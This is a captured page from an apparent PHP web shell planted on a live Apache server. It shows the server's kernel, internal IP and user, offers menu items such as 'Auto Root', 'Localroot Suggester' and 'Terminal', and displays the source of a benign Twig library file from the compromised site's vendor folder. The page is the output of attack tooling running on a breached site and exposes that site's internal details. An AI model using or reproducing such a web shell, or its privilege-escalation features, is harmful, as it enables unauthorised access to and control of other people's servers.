Linux cesa-www-main 6.1.0-49-cloud-amd64 #1 SMP PREEMPT_DYNAMIC Debian 6.1.174-1 (2026-05-26) x86_64
Apache/2.4.68 (Debian)
Server IP : 10.218.0.2 & Your IP : 216.73.217.117
Domains :
Cant Read [ /etc/named.conf ]
User : www-data
Terminal
Auto Root
Create File
Create Folder
Localroot Suggester
Backdoor Destroyer
Readme
/
var /
www /
v3.cesa.co.za /
vendor /
twig /
extra-bundle /
Delete
Unzip
Name
Size
Permission
Date
Action
DependencyInjection
[ DIR ]
drwxrwxr-x
2026-08-17 03:12
Resources
[ DIR ]
drwxrwxr-x
2026-08-17 03:12
.htaccess
237
B
-r-xr-xr-x
2026-08-17 03:12
Extensions.php
4.09
KB
-rwxrwxr-x
2026-02-07 08:07
LICENSE
1.04
KB
-rwxrwxr-x
2026-02-07 08:07
LeagueCommonMarkConverterFactory.php
962
B
-rwxrwxr-x
2026-02-07 08:07
MissingExtensionSuggestor.php
1.29
KB
-rwxrwxr-x
2026-02-07 08:07
README.md
206
B
-rwxrwxr-x
2026-02-07 08:07
TwigExtraBundle.php
1.07
KB
-rwxrwxr-x
2026-02-07 08:07
composer.json
1.18
KB
-rwxrwxr-x
2026-02-07 08:07
Save
Rename
<?php /* * This file is part of Twig. * * (c) Fabien Potencier * * For the full copyright and license information, please view the LICENSE * file that was distributed with this source code. */ namespace Twig\Extra\TwigExtraBundle; use Twig\Error\SyntaxError; final class MissingExtensionSuggestor { public function suggestFilter(string $name): bool { if ($filter = Extensions::getFilter($name)) { throw new SyntaxError(\sprintf('The "%s" filter is part of the %s, which is not installed/enabled; try running "composer require %s".', $name, $filter[0], $filter[1])); } return false; } public function suggestFunction(string $name): bool { if ($function = Extensions::getFunction($name)) { throw new SyntaxError(\sprintf('The "%s" function is part of the %s, which is not installed/enabled; try running "composer require %s".', $name, $function[0], $function[1])); } return false; } public function suggestTag(string $name): bool { if ($function = Extensions::getTag($name)) { throw new SyntaxError(\sprintf('The "%s" tag is part of the %s, which is not installed/enabled; try running "composer require %s".', $name, $function[0], $function[1])); } return false; } }